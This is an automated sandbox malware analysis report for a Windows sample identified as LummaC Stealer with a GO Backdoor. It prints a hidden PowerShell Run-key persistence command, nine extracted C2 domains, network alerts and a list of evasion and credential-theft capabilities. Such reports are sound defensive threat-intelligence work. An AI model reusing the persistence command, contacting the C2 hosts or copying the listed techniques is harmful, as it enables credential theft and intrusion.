Windows Analysis Report
Nepomuk.exe

Overview

General Information

Sample name: Nepomuk.exe
Analysis ID: 1663719
MD5: fac9214c35af0181c30099c68920f445
SHA1: 5fe0f210c6461db77ed5b7e265b85eae57ffa6f1
SHA256: 93c71027c0484c7be95f7285b2fe668b60b3bec52b0f57d0deb01fcdfe111a89
Tags: exe, user-Rony

Detection

GO Backdoor, LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contain functionality to detect virtual machines
Contains functionality to detect sleep reduction / modifications
Contains functionality to encrypt and move a file in one function
Contains functionality to log keystrokes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Nepomuk.exe (PID: 7724 cmdline: "C:\Users\user\Desktop\Nepomuk.exe" MD5: FAC9214C35AF0181C30099C68920F445)
    • T68WJ1SM1U30WFLN7XXTLWOX8.exe (PID: 5852 cmdline: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe" MD5: 8DDC00B505740E2BE081FCF120A6523A)
      • powershell.exe (PID: 4364 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • T68WJ1SM1U30WFLN7XXTLWOX8.exe (PID: 4508 cmdline: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe" MD5: 8DDC00B505740E2BE081FCF120A6523A)
    • powershell.exe (PID: 7316 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • T68WJ1SM1U30WFLN7XXTLWOX8.exe (PID: 1732 cmdline: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe" MD5: 8DDC00B505740E2BE081FCF120A6523A)
    • powershell.exe (PID: 5692 cmdline: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
{"C2 url": ["quantyu.bet/AOSkwi", "soursopsf.run/gsoiao", "changeaie.top/geps", "easyupgw.live/eosz", "liftally.top/xasj", "upmodini.digital/gokk", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "xcelmodo.run/nahd"], "Build id": "3cb89e8f70940188c63e82bafa7e7cbee0b03187b6a25af18f"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1356159060.0000000003F90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
0000000D.00000002.2472257494.000000000447C000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security
0000000A.00000002.2472321608.00000000049AC000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security
00000000.00000002.1471964767.0000000001550000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0000000D.00000002.2472257494.0000000004508000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GOBackdoor | Yara detected GO Backdoor | Joe Security
0.2.Nepomuk.exe.1550000.1.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.Nepomuk.exe.3550000.2.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0.2.Nepomuk.exe.1550000.1.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security

System Summary

Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4364, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe", ParentImage: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe, ParentProcessId: 5852, ParentProcessName: T68WJ1SM1U30WFLN7XXTLWOX8.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", ProcessId: 4364, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4364, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\App
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", CommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe", ParentImage: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe, ParentProcessId: 5852, ParentProcessName: T68WJ1SM1U30WFLN7XXTLWOX8.exe, ProcessCommandLine: powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }", ProcessId: 4364, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-12T09:26:25.294844+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49716 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:27.084877+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49717 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:28.341631+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49718 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:29.570168+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49719 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:31.652698+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49720 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:33.229489+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49721 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:36.799930+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49727 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:37.754261+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49728 | 140.82.114.3 | 443 | TCP
2025-04-12T09:26:38.633161+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49729 | 185.199.111.133 | 443 | TCP
2025-04-12T09:26:25.294844+0200 | 2061396 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49716 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:27.084877+0200 | 2061396 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49717 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:28.341631+0200 | 2061396 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49718 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:29.570168+0200 | 2061396 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49719 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:31.652698+0200 | 2061396 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49720 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:33.229489+0200 | 2061396 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49721 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:36.799930+0200 | 2061396 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49727 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:24.859642+0200 | 2061395 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49666 | 1.1.1.1 | 53 | UDP
2025-04-12T09:26:24.734313+0200 | 2061393 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 57934 | 1.1.1.1 | 53 | UDP
2025-04-12T09:26:39.185271+0200 | 2822537 | 1 | Attempted User Privilege Gain | 185.199.111.133 | 443 | 192.168.2.4 | 49729 | TCP

AV Detection

Source: https://changeaie.top/gepslite5; Avira URL Cloud: Label: malware
Source: https://changeaie.top/gepsoh; Avira URL Cloud: Label: malware
Source: https://changeaie.top/gepsO; Avira URL Cloud: Label: malware
Source: https://changeaie.top/gepsZ; Avira URL Cloud: Label: malware
Source: https://changeaie.top/gepsCO.; Avira URL Cloud: Label: malware
Source: https://changeaie.top/gepse0R; Avira URL Cloud: Label: malware
Source: https://changeaie.top/gepsj; Avira URL Cloud: Label: malware
Source: https://changeaie.top/geps5; Avira URL Cloud: Label: malware
Source: quantyu.bet/AOSkwi; Avira URL Cloud: Label: malware
Source: https://changeaie.top/n; Avira URL Cloud: Label: malware
Source: 0.2.Nepomuk.exe.3550000.2.unpack; Malware Configuration Extractor: LummaC {"C2 url": ["quantyu.bet/AOSkwi", "soursopsf.run/gsoiao", "changeaie.top/geps", "easyupgw.live/eosz", "liftally.top/xasj", "upmodini.digital/gokk", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "xcelmodo.run/nahd"], "Build id": "3cb89e8f70940188c63e82bafa7e7cbee0b03187b6a25af18f"}
Source: C:\Users\user\AppData\Local\Temp\NrEXDJiACHo.exe; ReversingLabs: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe; ReversingLabs: Detection: 25%
Source: Nepomuk.exe; Virustotal: Detection: 48%
Source: Nepomuk.exe; ReversingLabs: Detection: 52%
Source: Submitted Sample; Neural Call Log Analysis: 92.9%
Source: 0.2.Nepomuk.exe.3550000.2.unpack; String decryptor: quantyu.bet/AOSkwi
Source: 0.2.Nepomuk.exe.3550000.2.unpack; String decryptor: soursopsf.run/gsoiao
Source: 0.2.Nepomuk.exe.3550000.2.unpack; String decryptor: changeaie.top/geps
Source: 0.2.Nepomuk.exe.3550000.2.unpack; String decryptor: easyupgw.live/eosz
Source: 0.2.Nepomuk.exe.3550000.2.unpack; String decryptor: liftally.top/xasj
Source: 0.2.Nepomuk.exe.3550000.2.unpack; String decryptor: upmodini.digital/gokk
Source: 0.2.Nepomuk.exe.3550000.2.unpack; String decryptor: salaccgfa.top/gsooz
Source: 0.2.Nepomuk.exe.3550000.2.unpack; String decryptor: zestmodp.top/zeda
Source: 0.2.Nepomuk.exe.3550000.2.unpack; String decryptor: xcelmodo.run/nahd
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchIn
putHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
Source: C:\Users\user\Desktop\Nepomuk.exe; Code function: 0_2_0356ABFA CryptUnprotectData,CryptUnprotectData
Source: C:\Users\user\Desktop\Nepomuk.exe; Code function: 0_2_0356A1DB CryptUnprotectData

Compliance

Source: C:\Users\user\Desktop\Nepomuk.exe; Unpacked PE file: 0.2.Nepomuk.exe.3550000.2.unpack
Source: Nepomuk.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49716 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49718 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.42.7:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: Nepomuk.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]0_2_0157F9A6
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0D993EE3h]0_2_0157C8CC
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_01584B5B
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-349D2938h]0_2_0155BBC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]0_2_0155BBC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_01584BC6
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_01584BF3
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+10h]0_2_0157FAC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then push esi0_2_01575D33
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, word ptr [ebx]0_2_0159AC50
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+000001E4h]0_2_0155CC40
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+5C150C3Ch]0_2_0157FC7D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+10h]0_2_01591C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+08h]0_2_01591C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]0_2_01591C00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_01584C05
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], A0E666EBh0_2_01594CC0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then lea ecx, dword ptr [esp+00000138h]0_2_0156AC97
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esi+01h]0_2_01550F10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+000011C8h]0_2_0157AF00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi-1E5CF0B0h]0_2_01596F38
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_01582F20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+28h]0_2_0157DFD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax]0_2_01592FF2
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0158DF90
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_0157FEF9
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [edi], cx0_2_0157FEF9
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], A4BF7AEEh0_2_03595350
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]0_2_03595350
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+28h]0_2_0357EBD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], edi0_2_0356ABFA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax]0_2_0359D2D0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp], eax0_2_03561AF8
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_035841D1
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_035841D1
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, word ptr [ebx]0_2_0359B850
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+000001E4h]0_2_0355D840
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax]0_2_0359D0F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0359CD10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]0_2_0358034F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then lea ecx, dword ptr [esp+00000138h]0_2_0356B36A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax]0_2_03593B1D
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esi+01h]0_2_03551B10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-7E9317F6h]0_2_03571B10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+000011C8h]0_2_0357BB00
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi-1E5CF0B0h]0_2_03597B38
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]0_2_03583B20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [eax+esi-1E5CF0B0h]0_2_03597BD9
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [eax], cx0_2_035783C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_0358EB90
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [eax], dx0_2_0356F3B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp byte ptr [edx+esi], cl0_2_03552250
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax]0_2_03593269
